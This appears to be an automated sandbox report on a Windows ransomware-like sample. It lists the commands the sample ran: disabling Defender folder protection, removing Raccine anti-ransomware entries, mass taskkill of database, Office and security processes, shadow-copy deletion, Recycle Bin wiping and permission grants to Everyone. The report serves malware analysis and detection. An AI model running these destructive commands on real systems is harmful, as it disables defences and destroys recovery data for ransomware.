Analysis

  • max time kernel
    130s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    28-05-2021 09:57

General

  • Target

    0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

  • Size

    346KB

  • MD5

    aff561dee3b750728a4f2f8681cc252c

  • SHA1

    f3a3ee6042c819ae00d028437c5f02ebefe0eb08

  • SHA256

    0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454

  • SHA512

    6b73be255c3616dedb8c5c37254729526412967e886f3aa27038dfadb268efeb048ef3099575e4214b797c6fd555e2bcddb5f6c7b890903d0c6ca3b5b948d847

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs
  • Modifies file permissions 1 TTPs 15 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 58 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe"
    1⤵
    • Windows security modification
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:308
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      2⤵
        PID:1256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-MpPreference -verbose
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
      • C:\Windows\system32\taskkill.exe
        "taskkill" /F /IM RaccineSettings.exe
        2⤵
        • Kills process with taskkill
        PID:1720
      • C:\Windows\system32\reg.exe
        "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
        2⤵
          PID:280
        • C:\Windows\system32\reg.exe
          "reg" delete HKCU\Software\Raccine /F
          2⤵
          • Modifies registry key
          PID:752
        • C:\Windows\system32\schtasks.exe
          "schtasks" /DELETE /TN "Raccine Rules Updater" /F
          2⤵
            PID:1164
          • C:\Windows\system32\netsh.exe
            "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
            2⤵
              PID:516
            • C:\Windows\system32\sc.exe
              "sc.exe" config Dnscache start= auto
              2⤵
                PID:780
              • C:\Windows\system32\sc.exe
                "sc.exe" config SQLTELEMETRY start= disabled
                2⤵
                  PID:576
                • C:\Windows\system32\sc.exe
                  "sc.exe" config FDResPub start= auto
                  2⤵
                    PID:1316
                  • C:\Windows\system32\sc.exe
                    "sc.exe" config SSDPSRV start= auto
                    2⤵
                      PID:524
                    • C:\Windows\system32\sc.exe
                      "sc.exe" config SQLWriter start= disabled
                      2⤵
                        PID:1584
                      • C:\Windows\system32\sc.exe
                        "sc.exe" config SstpSvc start= disabled
                        2⤵
                          PID:1756
                        • C:\Windows\system32\sc.exe
                          "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                          2⤵
                            PID:1700
                          • C:\Windows\system32\sc.exe
                            "sc.exe" config upnphost start= auto
                            2⤵
                              PID:1596
                            • C:\Windows\system32\netsh.exe
                              "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                              2⤵
                                PID:1056
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mspub.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1896
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM synctime.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:604
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mspub.exe /F
                                2⤵
                                • Kills process with taskkill
                                PID:1620
                              • C:\Windows\system32\arp.exe
                                "arp" -a
                                2⤵
                                  PID:1988
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mydesktopqos.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1844
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mysqld.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:336
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM Ntrtscan.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:316
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mydesktopservice.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:396
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM sqbcoreservice.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1324
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM firefoxconfig.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1668
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM encsvc.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1012
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM isqlplussvc.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1540
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM onenote.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:524
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM agntsvc.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1588
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM excel.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:336
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM PccNTMon.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:928
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM thebat.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:792
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM CNTAoSMgr.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1596
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM msaccess.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:280
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM steam.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:548
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM sqlwriter.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:368
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM outlook.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1908
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM tbirdconfig.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1316
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM dbsnmp.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1164
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM tmlisten.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:632
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM xfssvccon.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1700
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM msftesql.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1720
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM wordpad.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1456
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM dbeng50.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1472
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM powerpnt.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:780
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mysqld-opt.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:788
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM thebat64.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:516
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mydesktopqos.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:436
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM ocomm.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1612
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM ocautoupds.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:240
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM infopath.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1544
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM visio.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1716
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM ocssd.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1844
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mydesktopservice.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1064
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mbamtray.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1616
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM oracle.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1596
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM winword.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:108
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM zoolz.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1764
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM sqlagent.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1696
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM sqlbrowser.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:336
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" IM thunderbird.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1164
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mysqld-nt.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1000
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM sqlservr.exe /F
                                  2⤵
                                  • Kills process with taskkill
                                  PID:1700
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM ragent.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1256
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM rmngr.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:868
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM sqld.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:368
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM rphost.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1908
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mysql.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1456
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM 1cv8.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1488
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM mysqld.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1988
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM sql.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1756
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM oracle.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  PID:280
                                • C:\Windows\system32\taskkill.exe
                                  "taskkill.exe" /IM vmwp.exe /f
                                  2⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:672
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                  2⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1348
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpBB92.bat
                                  2⤵
                                    PID:764
                                    • C:\Windows\system32\mountvol.exe
                                      mountvol
                                      3⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:928
                                    • C:\Windows\system32\find.exe
                                      find "}\"
                                      3⤵
                                        PID:1936
                                      • C:\Windows\system32\mountvol.exe
                                        mountvol !freedrive!: \\?\Volume{efb60be3-9a04-11eb-be03-806e6f6e6963}\
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:548
                                      • C:\Windows\system32\PING.EXE
                                        ping -n 2 127.0.0.1
                                        3⤵
                                        • Runs ping.exe
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:524
                                      • C:\Windows\system32\mountvol.exe
                                        mountvol !freedrive!: \\?\Volume{efb60be4-9a04-11eb-be03-806e6f6e6963}\
                                        3⤵
                                          PID:1224
                                        • C:\Windows\system32\PING.EXE
                                          ping -n 2 127.0.0.1
                                          3⤵
                                          • Runs ping.exe
                                          PID:1480
                                        • C:\Windows\system32\mountvol.exe
                                          mountvol !freedrive!: \\?\Volume{efb60be7-9a04-11eb-be03-806e6f6e6963}\
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1764
                                        • C:\Windows\system32\PING.EXE
                                          ping -n 2 127.0.0.1
                                          3⤵
                                          • Runs ping.exe
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1700
                                      • C:\Windows\system32\cmd.exe
                                        "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                        2⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1616
                                      • C:\Windows\system32\netsh.exe
                                        "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                        2⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1844
                                      • C:\Windows\system32\netsh.exe
                                        "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                        2⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1544
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:1936
                                      • C:\Windows\system32\arp.exe
                                        "arp" -a
                                        2⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1000
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:1664
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:368
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:568
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:576
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:788
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:1224
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:280
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\Windows\bootstat.dat /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:108
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\Windows\DtcInstall.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:1028
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\Windows\mib.bin /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:1236
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\Windows\PFRO.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:560
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\Windows\Professional.xml /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:1756
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\Windows\setupact.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:1540
                                      • C:\Windows\system32\icacls.exe
                                        "icacls.exe" C:\Windows\setuperr.log /grant Everyone:F /T /C /Q
                                        2⤵
                                        • Modifies file permissions
                                        PID:584
                                    • C:\Windows\system32\conhost.exe
                                      \??\C:\Windows\system32\conhost.exe "-1319854318557003316-197025906318638110641475010914-728389704452657245-1127867321"
                                      1⤵
                                        PID:1584
                                      • C:\Windows\system32\conhost.exe
                                        \??\C:\Windows\system32\conhost.exe "-2041150221-139216742420531062671372683766437050058-9021598481990883376-2113466463"
                                        1⤵
                                          PID:576
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "-1654703778-11155389602389044151795034831-737151100-1693754880-416420773-862112297"
                                          1⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1620
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "-18170060234789824731790282483-18055769162055425976-650737829-10009230921335141997"
                                          1⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:632
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "4059233541773072486-175457095655755918-230877684-21389762091547445088407668658"
                                          1⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:792
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "-296801976-8584194691581978723-1639195226-214708343399210340-370041931-1633028954"
                                          1⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:788
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "-1825017032-314029655-1050695464-1671124340-13061068556373221-49912996442531775"
                                          1⤵
                                            PID:1056
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "-103128349210366574347894028281824445993-1062508143-193181904220913664181450629041"
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1720
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "2021900841287892872-113760999916510230921170980837534828524455347386510601004"
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1668
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "5986463921559380296220722059-113610604153552859792648091-185250937340686883"
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1316
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "-1761125083170329475519035280681277835870-159683595820761129-1437285160-166953171"
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:516
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "-1324275007754262785-1421020052-2010549880146960427610035925052003030909-592701728"
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1256
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "796747103-112640587-5183849756508057593748361971453065374-1776108243153904859"
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:240
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "9129326561064203681220087496-655890641568894366-458022232995240479124135592"
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:280

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • memory/308-60-0x0000000000B30000-0x0000000000B31000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/308-62-0x000000001AEC0000-0x000000001AEC2000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1256-75-0x00000000025E4000-0x00000000025E6000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1256-74-0x00000000025E0000-0x00000000025E2000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1256-65-0x000007FEFC661000-0x000007FEFC663000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1256-69-0x000000001AB40000-0x000000001AB41000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-68-0x0000000002010000-0x0000000002011000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-72-0x0000000002430000-0x0000000002431000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1348-171-0x0000000002000000-0x0000000002001000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1348-172-0x000000001ACE0000-0x000000001ACE1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1348-174-0x000000001AC64000-0x000000001AC66000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1348-173-0x000000001AC60000-0x000000001AC62000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1348-175-0x00000000026E0000-0x00000000026E1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1348-176-0x0000000002490000-0x0000000002491000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1768-76-0x000000001ACB0000-0x000000001ACB2000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1768-97-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1768-84-0x0000000002900000-0x0000000002901000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1768-81-0x00000000028D0000-0x00000000028D1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1768-77-0x000000001ACB4000-0x000000001ACB6000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/1768-96-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1768-78-0x0000000002710000-0x0000000002711000-memory.dmp

                                            Filesize

                                            4KB